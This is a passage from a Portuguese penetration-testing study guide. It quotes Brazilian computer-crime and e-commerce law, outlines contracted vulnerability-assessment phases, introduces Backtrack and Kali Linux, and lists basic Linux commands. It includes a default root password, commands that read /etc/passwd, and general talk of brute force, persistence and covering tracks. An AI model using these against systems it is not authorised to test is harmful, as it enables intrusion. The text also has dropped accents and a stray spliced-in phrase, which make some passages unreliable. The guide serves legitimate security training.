...............................................................................................................
concessionrias de servios pblicos. Ler completo em
http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art154b
Art. 3o Os arts. 266 e 298 do Decreto-Lei no 2.848, de 7 de
dezembro de 1940 - Cdigo Penal, passam a vigorar com a seguinte
redao:
Interrupo ou perturbao de servio telegrfico, telefnico,
informtico, telemtico ou de informao de utilidade pblica.
Art. 266. 1 Incorre na mesma pena quem interrompe servio
telemtico ou de informao de utilidade pblica, ou impede ou
dificulta-lhe o restabelecimento. Ler na integra em
http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art266
2o Aplicam-se as penas em dobro se o crime cometido por ocasio de
calamidade pblica. (NR)
Falsificao de documento particular
Art. 298. Falsificar, no todo ou em parte, documento particular
ou alterar documento particular verdadeiro: Ler na integra em
http://www.planalto.gov.br/CCIVIL_03/DecretoLei/Del2848.htm#art298
Falsificao de carto: Pargrafo nico. Para fins do disposto no
caput, equipara-se a documento particular o carto de crdito ou dbito.
(NR)
Art. 4o Esta Lei entra em vigor aps decorridos 120 (cento e
vinte) dias de sua publicao oficial.
Braslia, 30 de novembro de 2012; 191o da Independncia e 124o da
Repblica.

www.clubedohacker.com.br

84

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
DILMA ROUSSEFF
Jos Eduardo Cardozo
Decreto n 7.962, de 15 de maro de 2013 (DOU de 15/03/2013)
Regulamenta a Lei n 8.078, de 11 de setembro de 1990, para dispor
sobre a contratao no comrcio eletrnico.
Presidncia da Repblica
Casa Civil
Subchefia para Assuntos Jurdicos
DECRETO N 7.962, DE 15 DE MARO DE 2013
A PRESIDENTA DA REPBLICA, no uso da atribuio que lhe
confere o art. 84, caput, inciso IV, da Constituio, e tendo em vista o
disposto na Lei no 8.078, de 11 de setembro de 1990,
DECRETA:
Art. 1o Este Decreto regulamenta a Lei no 8.078, de 11 de
setembro de 1990, para dispor sobre a contratao no comrcio
eletrnico, abrangendo os seguintes aspectos:
I - Informaes claras a respeito do produto, servio e do fornecedor;
II - Atendimento facilitado ao consumidor; e
III - Respeito ao direito de arrependimento.
Art. 2o Os stios eletrnicos ou demais meios eletrnicos
utilizados para oferta ou concluso de contrato de consumo devem
disponibilizar, em local de destaque e de fcil visualizao, as seguintes
informaes:
I - Nome empresarial e nmero de inscrio do fornecedor, quando
houver, no Cadastro Nacional de Pessoas Fsicas ou no Cadastro
Nacional de Pessoas Jurdicas do Ministrio da Fazenda;
II - Endereo fsico e eletrnico, e demais informaes necessrias para
sua localizao e contato;

www.clubedohacker.com.br

85

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
III - Caractersticas essenciais do produto ou do servio, includos os
riscos sade e segurana dos consumidores;
IV - Discriminao, no preo, de quaisquer despesas adicionais ou
acessrias, tais como as de entrega ou seguros;
V - Condies integrais da oferta, includas modalidades de pagamento,
disponibilidade, forma e prazo da execuo do servio ou da entrega ou
disponibilizao do produto; e
VI - Informaes claras e ostensivas a respeito de quaisquer restries
fruio da oferta.
Art. 3o Os stios eletrnicos ou demais meios eletrnicos
utilizados para ofertas de compras coletivas ou modalidades anlogas de
contratao devero conter, alm das informaes previstas no art. 2o, as
seguintes:
I - Quantidade mnima de consumidores para a efetivao do contrato;
II - Prazo para utilizao da oferta pelo consumidor; e
III - Identificao do fornecedor responsvel pelo stio eletrnico e do
fornecedor do produto ou servio ofertado, nos termos dos incisos I e II
do art. 2o.
Art. 4o Para garantir o atendimento facilitado ao consumidor no
comrcio eletrnico, o fornecedor dever:
I - Apresentar sumrio do contrato antes da contratao, com as
informaes necessrias ao pleno exerccio do direito de escolha do
consumidor, enfatizadas as clusulas que limitem direitos;
II - Fornecer ferramentas eficazes ao consumidor para identificao e
correo imediata de erros ocorridos nas etapas anteriores finalizao
da contratao;
III - Confirmar imediatamente o recebimento da aceitao da oferta;
IV - Disponibilizar o contrato ao consumidor em meio que permita sua
conservao e reproduo, imediatamente aps a contratao;
V - Manter servio adequado e eficaz de atendimento em meio
eletrnico, que possibilite ao consumidor a resoluo de demandas

www.clubedohacker.com.br

86

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
referentes a informao, dvida, reclamao, suspenso ou
cancelamento do contrato;
VI - Confirmar imediatamente o recebimento das demandas do
consumidor referidas no inciso, pelo mesmo meio empregado pelo
consumidor; e
VII - Utilizar mecanismos de segurana eficazes para pagamento e para
tratamento de dados do consumidor.
Pargrafo nico. A manifestao do fornecedor s demandas previstas
no inciso V do caput ser encaminhada em at cinco dias ao
consumidor.
Art. 5o O fornecedor deve informar, de forma clara e ostensiva,
os meios adequados e eficazes para o exerccio do direito de
arrependimento pelo consumidor.
1o O consumidor poder exercer seu direito de arrependimento pela
mesma ferramenta utilizada para a contratao, sem prejuzo de outros
meios disponibilizados.
2o O exerccio do direito de arrependimento implica a resciso dos
contratos acessrios, sem qualquer nus para o consumidor.
3o O exerccio do direito de arrependimento ser comunicado
imediatamente pelo fornecedor instituio financeira ou
administradora do carto de crdito ou similar, para que:
I - A transao no seja lanada na fatura do consumidor; ou
II - Seja efetivado o estorno do valor, caso o lanamento na fatura j
tenha sido realizado.
4o O fornecedor deve enviar ao consumidor confirmao imediata do
recebimento da manifestao de arrependimento.
Art. 6o As contrataes no comrcio eletrnico devero observar
o cumprimento das condies da oferta, com a entrega dos produtos e
servios contratados, observados prazos, quantidade, qualidade e
adequao.

www.clubedohacker.com.br

87

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Art. 7o A inobservncia das condutas descritas neste Decreto
ensejar aplicao das sanes previstas no art. 56 da Lei no 8.078, de
1990. Ler na integra em
http://www.planalto.gov.br/ccivil_03/LEIS/L8078.htm#art5
Art. 8o O Decreto no 5.903, de 20 de setembro de 2006, passa a
vigorar com as seguintes alteraes:
Art. 10. Pargrafo nico. O disposto nos arts. 2o, 3o e 9o deste
Decreto aplica-se s contrataes no comrcio eletrnico. (NR)
Art. 9o Este Decreto entra em vigor sessenta dias aps a data de
sua publicao.
Braslia, 15 de maro de 2013; 192 da Independncia e 125 da
Repblica.
DILMA ROUSSEFF
Jos Eduardo Cardozo

Concluso:
Art. 186 do CPC
Aquele que, por ao ou omisso voluntria, negligncia ou
imprudncia, violar direito e causar dano outrem, ainda que
exclusivamente moral.
Art.187 do CPC
Tambm comete ato ilcito o titular de um direito que, ao exerc-lo,
excede manifestamente os limites impostos pelo seu fim econmico ou
social, pela boa-f ou pelos bons costumes.
A impercia, a imprudncia e a negligncia de alguns profissionais,
violam direitos e causa danos muitas vezes irreparveis, razo pela qual,

www.clubedohacker.com.br

88

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
nesses casos a Justia determina a compensao financeira do ofendido.
Um breve conceito sobre Imprudncia, Negligncia e Impercia.
Negligncia: Tambm conhecida como desateno ou falta de cuidado
ao exercer certo ato, consiste na ausncia de necessria diligncia,
implicando em omisso ou inobservncia de dever, ou seja, aquele de
agir de forma diligente, prudente, agir com o devido cuidado exigido
pela situao em tese.
Imprudncia: Tem a ver com algo mais que mera falta de ateno, ato
que pode revelar-se de m-f, ou seja, com conhecimento do mal e a
inteno de pratic-lo a ao imprudente aquela revestida de dolo e
m-f concretizada. Age de forma imprudente aquele que mesmo
sabedor do grau de risco envolvido, acredita que seja possvel a
realizao do ato sem prejuzo.
Impercia: Requer-se do agente a falta de tcnica ou de conhecimento,
de outra forma, tem-se uma omisso daquilo que o agente no deveria
desprezar, pois consiste em sua funo, seu ofcio exigindo dele percia
suficiente para exercer suas funes a que lhe so atribudas.
Diante do exposto, pode-se concluir que o trabalho de um analista de
vulnerabilidades exige muito mais que conhecimento das ferramentas de
informatica disponveis, mais exige conhecimentos bsicos sobre as
Leis, no somente do seu pas de origem, mais dependendo do escopo
dos testes, tambm se far necessrio o estudos das leis de outros pases.
Conclui-se que as clausulas referente ao escopo das responsabilidades
no devem sob nenhuma hiptese serem negligenciadas.
Considere a situao em que o analista se ver diante de uma
infraestrutura de tecnologia da informao para fazer uma analise de
vulnerabilidades e nessa infraestrutura existem servidores de banco de
dados em trs pases diferentes! Na pratica esse analista deve procurar
estudar um pouco sobre as leis de informatica e utilizao da
infraestrutura de internet de cada pas e no somente de seu pas de

www.clubedohacker.com.br

89

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
origem. Esse conhecimento de fundamental importncia para o
analista, j que em muitos casos, principalmente com clientes de
pequeno porte, o cliente no tem todas as informaes necessrias,
principalmente quando se trata de infraestrutura web.
Tambm deve o analista, ficar atento ao site do ministrio das relaes
exteriores do Brasil em: http://www.itamaraty.gov.br/ Pois existe
tambm a possibilidade de tratados internacionais que venham permitir a
execuo de determinados testes, tomando-se como base a Lei brasileira,
Existem os acordos bilaterais e outros acordos de cooperao, j que
muitos pases ainda no tem nenhuma legislao especifica em relao a
crimes de internet.
Objetivo
Uma analise de vulnerabilidades visa identificar fragilidades nos
sistemas computacionais, falhas de configuraes, falhas de projeto,
falhas de programao e potenciais ameaas atravs da realizao de
ataques aos ativos e ataques de engenharia social com foco definido em
contrato celebrado entre o contratante e o prestador de servio.
Entre as clausulas de tal contrato deve ser estabelecido com clareza
proteo do contratado e um acordo de confidencialidade para que se
possam preservar as informaes do contratante.
Acordo de confidencialidade e responsabilidade
O acordo de confidencialidade visa proteo do cliente contra a
divulgao no autorizada de resultados ou dados identificados pela
contratada durante a realizao do servio e nesse ponto fundamental
que todas as pesquisas sobre o prestador de servio j estejam
concludas.

www.clubedohacker.com.br

90

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
de fundamental importncia incluso de uma clausula que limite o
uso das informaes pelo contratado em seus prepostos e que esteja
muito bem definida em contrato.
Com o mesmo empenho devem-se estabelecer todos os passos dos
testes, isso ir definir o escopo dos testes e as responsabilidades sobre a
posse e propriedade dos dispositivos testados.
Padres
importante seguir modelos j padronizados e consagrados em relao
aos procedimentos que devem ser adotados, padres internacionais de
Testes de Invaso, como, OWASP em:
http://www.owasp.com/index.php/Main_Page, OSSTMM em:
http://www.isecom.org/research/osstmm.html etc.
Mais nada impede que voc acrescente ou subtraia alguma atividade ou
procedimento, afinal uma analise padronizada na Europa ou mesmo nos
USA pode no ser o ideal para seu caso.
Metodologias
Deve-se utilizar metodologias conhecidas sempre que possvel e dividir
em etapas com foco definido, contemplando as informaes detalhadas
sobre os nveis de controle de acesso, computadores e redes de
telecomunicaes, redes sem fio, dispositivos mveis, segurana fsica,
aplicaes web etc.
Deve-se focar sempre os detalhes tcnicos de quais itens exatamente
devem ser testados. Uma boa metodologia a Open Source Security
Testing Methodology Manual (OSSTMM) e pode ser encontrada para
estudo em http://www.isecom.org/
Os relatrios devem ser avaliados por pessoal tcnico qualificado para
eliminar ou reduzir as possibilidades de induo ao erro no que se refere

www.clubedohacker.com.br

91

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
idoneidade da contratada, evitando relatrios ou parte de relatrios
fictcios.
Reconhecimento
O reconhecimento e ou "coleta passiva" no exige nenhum contato com
o sistema alvo, as informaes so coletadas a partir de fontes pblicas,
sites, publicaes em jornais etc. e geralmente servem como uma
avaliao preliminar sobre o alvo. Essas informaes so essenciais para
modelar os ataques e determinar quais vetores podem ser explorados
mais facilmente. O primeiro passo vasculhar a Internet em busca de
qualquer informao que voc considere relevante para o caso. As
tcnicas mais comuns so consultas a servios de WHOIS e DNS
atravs de ferramentas como whois, dig, nslookup etc. Sites como
Google www.google.com e Server Sniff www.serversniff.net so de
extrema importncia, listas de discusso, blogs corporativos e de
colaboradores, engenharia social, publicaes na mdia tambm
costumam conter informaes relevantes que podem ajudar no
dimensionamento dos ataques. Na fase de reconhecimento ser
necessrio o domnio de todas as ferramentas disponveis no mercado,
ferramentas essas que lhe daro base slida sobre a infraestrutura e o
alvo a ser testado.
Detalhar todas as atividades
Nada pode ficar sem documentao detalhada sobre os trabalhos
realizados na auditoria da infraestrutura do cliente. Atas de todas as
reunies em todas as fases do projeto. Nas avaliaes presenciais, se for
o caso, o analista deve portar sempre uma prancheta eletrnica e uma
agenda para pontuar situaes que lhe atraia a ateno, esse
procedimento tambm vlido para as avaliaes remotas, lembre-se; o
objetivando encontrar informaes sobre possveis brechas que possam
ser exploradas por usurios no autorizados.

www.clubedohacker.com.br

92

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Tipos de testes
A definio do tipo de teste se ser do tipo "caixa preta", "caixa branca"
ou "caixa cinza". Testes de Negao de Servio podem tambm,
adicionalmente serem realizados, desde que estejam dentro do escopo do
servio contratado pelo cliente, pois um teste de invaso pode ser
realizada de vrias maneiras, a diferena mais comum a quantidade de
conhecimentos sobre os detalhes de implementao do sistema que est
sendo testado.
Nos testes de caixa preta a equipe no recebe nenhuma informao
prvia sobre a infraestrutura do cliente e deve primeiro determinar a
localizao e extenso dos sistemas ativos disponveis para iniciar a
anlise.
Do outro lado temos o teste de caixa branca onde a equipe de pentesters
recebem informaes detalhadas e o mais completo relatrio possvel
sobre a infraestrutura que devem testar, incluem ai informaes sobre os
diagramas de rede, cdigo fonte, equipamentos ativos e informaes de
endereamento IP.
Existem tambm os chamados meio termos onde os testes e informaes
podem variar de acordo com a vontade do cliente, essas varaes podem
ser classificadas como testes de caixa cinza .
Scanning
Na fase de scanner ser necessria a utilizao de ferramentas que torne
possvel a descoberta de informaes sobre os sistemas e servios
disponveis, sistemas operacionais, aplicaes, estado das portas,
verses dos servios de rede etc.
Sondagem e Mapeamento
Consistem na varredura por hosts ativos, mapeamento de topologia e
regras de firewall, deteco de servios em execuo etc.

www.clubedohacker.com.br

93

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Fora Bruta
Visa detectar servios de autenticao ou controle de acesso vulnerveis
a ataques de tentativa e erro de senhas. Analisa a qualidade da poltica
de senha e de sua implementao.
Anlise de Trfego de Rede
Verifica se possvel identificar e obter alguma informao sensvel
atravs da manipulao de trfego de rede.
Avaliao de Servidores Web
Busca as principais vulnerabilidades em servios deste tipo. Manipula
requisies de modo a tentar comprometer a segurana de servios web.
Obteno de acesso "Invaso"
Essa uma fase crucial e somente deve ser executada se estiver no
escopo do contrato, aqui os agentes envolvidos no processo, devem reler
as clausulas contratual, pois existem riscos de indisponibilidade ou ate
mesmo o comprometimento de aplicaes na hora dos testes. Ou seja,
deve haver uma clausula contratual que esclarea como devem ser feitos
os testes, a que horas, a previsibilidade de problemas de
indisponibilidade etc.
Manuteno do acesso
Dificilmente se executam essa etapa, j que, normalmente no h
interesse por parte do cliente de tal necessidade. Um cliente jamais iria
desejar ter em seus sistemas computacionais alguma backdoor ou outro
tipo de dispositivo de acesso remoto no autorizado j que a
comprovao de vulnerabilidades pode ter sido feita na etapa anterior.

www.clubedohacker.com.br

94

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Limpeza de rastros
Apensar de apresentar nesse trabalho algumas ferramentas para essa
tarefa, mesma no tem tido muita utilidade, j que na maioria das
vezes nem mesmo a invaso permitida pelo escopo.
Documentao
Na documentao deve-se apresentar a fundamentao do trabalho, pois,
nessa fase sero apresentados todos os passos percorridos, qual a
metodologia utilizada, quais informaes encontradas, qual o grau de
risco encontrado, o impacto sobre o negocio do cliente caso tais
vulnerabilidades sejam exploradas por algum malicioso e como corrigir
o problema.
Apresentao dos resultados e sugestes
Sugestes de como corrigir as vulnerabilidades encontradas e manter os
sistemas computacionais seguros. Deve-se apresentar o relatrio o mais
detalhado possvel com todas as sugestes necessria a boa execuo de
tais sistemas com risco mnimo de segurana e um plano de
contingencia em casos de comprometimento dos sistemas por algum
por acesso no autorizado.

O Backtrack e o Kali Linux


O Backtrack e o Kali Linux so distribuies Linux, o que j
seria um grande diferencial, mas no; eles so s isso. Eles so
distribuies Linux idealizadas para atender um segmento de mercado
que tinha que fazer tudo no brao "os hackers" sempre que

www.clubedohacker.com.br

95

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
precisavam de alguma coisa nesse segmento, tinham que desenvolver
ou mesmo que no o fizesse, eram obrigados a trabalhar com o
imenso arsenal de ferramentas dispersas j desenvolvidas para uma
infinidade de propsitos e diversos programadores.
Depois do backtrack todos os nossos problemas em analise de
vulnerabilidades acabaram e hoje s voc digitar o login "root" a
senha "toor" que imediatamente voc ser direcionado a uma Shell
Linux, aqui que comea uma maravilhosa experincia pois o
backtrack no um sistema Linux qualquer. Baseado no kernel do
Ubuntu, o que facilitou bastante em relao a sua antiga verso que
era baseada em slackware o que tornava o aprendizado bem mais
difcil.

Como padro o backtrack apresentar sempre uma shell linux e


se voc deseja utiliza-lo em ambiente grfico basta digitar startx

www.clubedohacker.com.br

96

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

O Ubuntu a distribuio Linux usada pela maioria dos usurios que


utilizam desktops por seu conjunto de facilidades e o backtrack
usado por todos os analistas de vulnerabilidades que eu conheo.
Um analista que utiliza o backtrack tem seu trabalho facilitado
de forma extraordinria, todos os hackers e estudantes de segurana
da informao se j no o fazem, devem conhecer e utilizar o
backtrack.
Imediatamente aps voc digitar startx e pressionar enter voc
ser apresentado ao backtack em ambiente grfico incluindo as
facilidades do sistema linux, mais especificamente as facilidades do
Ubuntu.

www.clubedohacker.com.br

97

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Atualmente o backtrack tem um composto de mais de 300


ferramentas diferentes e atualizadas.
Nossa meta apresentar e ensinar a utilizao de todas elas,
mais nessa obra sero apresentadas em media 30% delas, j que esse
projeto teve que ser dividido em volumes.
Acreditamos que essa obra ser de grande valia para
profissionais de redes e todos aqueles que desejam entrar nesse
mercado ou buscar conhecimentos aprofundados sobre analise de
vulnerabilidades de forma objetiva.

www.clubedohacker.com.br

98

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Existem muitas solues comerciais para esse trabalho e no


podemos negar a sua importncia, mais o backtrack imbatvel por
oferecer as facilidades de um sistema Linux fcil de usar, como o
caso do Ubuntu e combinar com um verdadeiro arsenal para testes de
invaso.
Solues como Metasploit e Nmap esto integradas ao backtrack
por serem fundamentais para o trabalho dos analistas.

Comandos em Shell Linux


Para aqueles que ainda no esto familiarizados com Linux eu
resolvi incluir esse tpico com alguns comandos bsicos, mais com
foco especifico na atividade de analise de vulnerabilidades, no tenho
aqui a pretenso de escrever nessa obra tudo sobre Linux, mais como
grande parte de nossa obra esta baseada numa distribuio Linux eu
creio ser de grande valia para todos.

www.clubedohacker.com.br

99

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Usando o interpretador de comandos

Abre uma nova sesso para um usurio: # login


Tem como funo desconectar um usurio de uma determina sesso:
# logout
O objetivo encerrar uma sesso de trabalho: # exit
Comandos para desligar o computador: # halt (desliga sumariamente)
# shutdown -h now (desliga agora)
# shutdown 18:00 (desliga em um horrio especificado)
# shutdown -h 10 (desliga em menos n tempo)
# shutdown <opes> <hora> <mensagem> (desliga na hora
especificada e envia mensagem na rede)
Comando para reiniciar o computador: # reboot ou # shutdown -r
now

www.clubedohacker.com.br

100

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
ou # shutdown -r 15 now ou # init 6
Exibir a quantidade de tempo desde a ltima reinicializaro do
sistema: # uptime
Pgina de manual e de informaes sobre os comandos: # man
shutdown
Visualizar os processos em tempo real: # top
Processos em execuo no sistema: # ps aux
Arquitetura de mquina: # arch
Mostra o diretrio corrente: # pwd
Comando que muda um subdiretrio corrente a partir do diretrio
atual: # cd [diretrio] # cd /root
# cd - (volta ao ltimo diretrio acessado)
# cd .. (acessa o diretrio anterior na rvore de diretrios)
Criar novo diretrio: # mkdir [diretrio]
Remover diretrio vazio: # rmdir [diretrio]
Remover um diretrio e todo o seu contedo: # rm rf [diretrio]

www.clubedohacker.com.br

101

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Criando um arquivos: # touch arquivo
Movendo um arquivo: # mv /root/teste /home/user/
Movendo um arquivo para o diretrio local: /home/user# mv
/root/teste
Copiando um arquivo: # cp gnu /home/user/
# cp /root/gnu /home/user
Copiando um arquivo para o diretrio local: /home/user# cp
/root/gnu .
Editando um arquivo: # nano gnu
Exibe a rvore de diretrios: /# tree
Exibir informaes do sistema, tais como: o sistema operacional,
verso do kernel, arquitetura da mquina e muitos outros: # uname
[opes] # uname -r (verso de kernel)
# uname -m (arquitetura de mquina)
# uname -n (mostra o hostname)
# uname -p (mostra o tipo de processador)

www.clubedohacker.com.br

102

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
# uname -v (mostra a data da verso do kernel)
# uname -o (mostra o nome do Sistema Operacional)
# uname -s (mostra o nome do Kernel)
# last (Mostra uma listagem de entrada e sada de usurios no
sistema)
# history (Exibe o histrico)
# lastb (Logins mal sucedidos)
Comandos para criao manipulao de contas de usurios
adduser (pode-se tambm utilizar-se do comando useradd);

adduser opes usurio


Em opes, pode-se colocar parmetros especficos para a configurao
da conta de usurio que ser criada. Consulte o manual completo do
comando, digitando man adduser no terminal.

www.clubedohacker.com.br

103

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
#passwd adonel (trocar a senha do usurio adonel)

Listar usurios do sistema


#getent passwd | cut -d\: -f1 ou simplesmente #getent passwd ou #cat
/etc/passwd (exibe informaes sobre as contas dos usurios e do
sistema)

#who (Para usurio logado)

www.clubedohacker.com.br

104

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

Comandos de configurao e consulta de redes


A configurao da rede no Linux feita de forma muito simples
atravs do comando ifconfig ethx "onde x representa o numero da
placa de rede" e ou dentro do arquivo /etc/network/interfaces, neste
arquivo voc vai colocar as informaes de ip / mscara / gateway e
outras informaes que considere necessrias para o bom
funcionamento da rede.
Edite com seu editor de texto preferido ou
# vi /etc/network/interfaces

www.clubedohacker.com.br

105

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

# Para que a placa eth0 possa subir automaticamente


auto eth0

www.clubedohacker.com.br

106

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
# Configurao para que o ip fique esttico, ou seja, no mude como
no caso em que voc est utilizando dhcp.
iface eth0 inet static
address xxx.xxx.x.xx
netmask 255.255.255.0
gateway xxx.xxx.x.254
network xxx.xxx.x.0
broadcast xxx.xxx.x.255
"Onde xxx.xx.xx.xx representa os ip's da rede, a mascara de sub-rede,
o gateway padro, a rede e o endereo de broadcast".

Aps a escolha das configuraes desejadas no arquivo de


configurao, basta salvar e sair do arquivo.
Adicionalmente pode-se configurar as informaes de DNS no
arquivo resolv.conf que fica dentro do diretrio /etc;
# vi /etc/resolv.conf
nameserver xxx.xxx.xxx.xxx
nameserver xxx.xxx.xx.xxx
onde xxx.xxxx.xx.xxx representa o ip de seus servidores DNS, seja
local ou remoto.
Ao final, basta reiniciar as placas de rede;
# /etc/init.d/networking restart

www.clubedohacker.com.br

107

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Alguns comandos teis
#ifconfig (ir exibir as informaes dos adaptadores de redes).

#ifonfig eth0 192.168.0.50 (Ir configurar a placa de rede eth0 com o


ip 192.168.0.50 e mascara de sub-rede padro 255.255.255.0)
#route n (Consulta a tabela de roteamento da mquina local)

www.clubedohacker.com.br

108

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................

#route add defalut gw 192.168.1.10 (Adiciona uma rota padro ao


arquivo de configurao de roteamento na mquina local).

#dhclient (Responsvel por configurar a rede automaticamente


atravs de um servidor DHCP disponvel na rede).

www.clubedohacker.com.br

109

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Instalao de programas (pacotes)
A instalao de pacotes (como so chamados os programas no
Linux) muito simples, basta ter indexado o
repositrio no arquivo /etc/apt/sources.list

Estando tudo devidamente indexado, basta digitar no


prompt em qualquer shell com poderes de root o comando
aptitude install + nome do pacote que deseja instalar, mais
nem sempre esse pacote pode estar relacionado nos
servidores espelho disponveis na internet. Nesses casos
teremos que baixar o cdigo fonte e compilar, em seguida
fazer a instalao, s assim o programa funcionar
corretamente.

www.clubedohacker.com.br

110

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Compilao de programas
O procedimento de compilao de um programa bem simples
e parte do princpio que, atravs do cdigo fonte do programa
disponvel para uso, qualquer um possa ter acesso ao cdigo e gerar o
binrio final. O procedimenNenhuma entrada de ndice remissivo
foi encontrada.to de compilao sempre bem parecido para todas
as aplicaes, porm quando for compilar algum programa devemos
consultar o arquivo INSTALL que sempre est presente junto com
o cdigo fonte.
Durante este trabalho ser necessrio apenas dos seguintes
pacotes pr-instalados:

gcc

g++

make

libc6-dev

glibc-devels (algumas outras distribuies usam)


Conceito de compilao de programas: A compilao

sempre um processo simples, mais deve ser observado o roteiro

www.clubedohacker.com.br

111

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
abaixo para que possamos ter uma compilao tranquila do inicio ao
fim.

Se tiver o ./configure, rode o configure. Todos os recursos de


compilao esto no makefile.
Compilando o Nmap como exemplo prtico: Vamos baixar o
nmap (utilitrio de rede que iremos utilizar em momento especifico
nessa obra para verificao e anlise de portas, servios de rede e
vulnerabilidades). Baixe o cdigo fonte, que est disponvel em
www.insecure.org.
Descompacte o pacote: # tar xvjf nmap-verso.tar.bz2 C
/usr/local

www.clubedohacker.com.br

112

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Acesse o diretrio onde se encontram os cdigos fonte: # cd
/usr/local/nmap-verso
Comeando a compilao: Execute o script configure, este ir
passar os parmetros de como deve ser compilado o programa e gerar
o arquivo Makefile, que servir como referncia para o comando
make. Digite: # ./configure
Compile o pacote com o comando: # make
Opcionalmente voc pode testar a integridade dos binrios
compilados atravs do comando: # make check
Se no tiver havido nenhum erro, agora j pode instalar o
programa, os arquivos de dados e a documentao com o comando: #
make install
Caso necessrio pode-se remover os arquivos binrios e de
objeto do diretrio fonte que no sero mais necessrios: # make
clean
Agora s testar:
# nmap localhost

www.clubedohacker.com.br

113

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Obs: onde se l verso deve-se substituir pelo numero da verso do
Nmap que voc fez download. Consulte sempre o manual atualizado
no site oficial do programa que voc deseja instalar.
Pois , j estvamos muito satisfeitos com o Backtrack, eis que
o pessoal resolve nos presentear com o Kali Linux, uma distribuio
Linux baseada em Debian, muito mais estvel que o ubuntu e com a
maioria das ferramentas recompiladas.
E o que melhor, suporte total a maioria dos dispositivos
Wireless.

O que o Kali Linux?

www.clubedohacker.com.br

114

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Kali Linux uma avanada distribuio Linux especializada em
Testes de Intruso e Auditoria de Segurana.

Quais as funcionalidades do Kali Linux?


Kali uma reconstruo completa do BackTrack Linux, que adere
totalmente aos padres de desenvolvimento do Debian.
Uma infraestrutura completamente nova foi montada,
todas as ferramentas foram revistas e empacotadas, e ns
utilizamos Git como nosso Sistema de Controle de
Verses.
Mais de 300 ferramentas de testes de intruso:
Depois de rever cada ferramenta que estava includa no
Backtrack, eliminamos um grande nmero de ferramentas que
no funcionavam, ou para as quais havia outra ferramenta com
funcionalidade semelhante.
Sempre ser gratuito: Kali Linux, como seu
predecessor, completamente livre, e sempre permanecer
como tal. Voc nunca, mais nunca mesmo ter que pagar pelo
Kali Linux.
Repositrio Git livre: Somos proponentes convictos do
software de cdigo aberto e nosso repositrio est disponvel
para todos que todos vejam e todos os fontes esto disponveis
para aqueles que desejem adaptar e remontar os pacotes.
Complacente com o padro FHS: O
Kali
foi
desenvolvido para aderir ao Padro Hierrquico do Sistema de

www.clubedohacker.com.br

115

ADONEL BEZERRA
GUIA DE ESTUDOS PARA ANALISE DE VULNERABILIDADES
...............................................................................................................
Arquivos (ou FHS da sigla em ingls), permitindo que todos os
usurios Linux facilmente localizem arquivos binrios, de
apoio, bibliotecas, etc.
Vasto suporte dispositivos wireless: Construmos o
kali Linux para suportar tantos dispositivos wireless quanto
pudemos, permitindo que o mesmo executasse adequadamente
numa vasta gama de hardware e o tornando compatvel como
diversos outros dispositivos sem fio e USB.
Kernel adaptado para injeo de pacotes: Como
consultores de testes de intruso, a equipe de desenvolvimento
s vezes precisa fazer avaliaes em redes sem fio, ento nosso
kernel j inclui os ltimos patches de injeo de pacotes.
Ambiente de desenvolvimento seguro: A equipe do
Kali Linux formada de um pequeno grupo de pessoas de
confiana as quais s podem submeter pacotes e interagir com
os repositrios usando mltiplos protocolos de segurana.
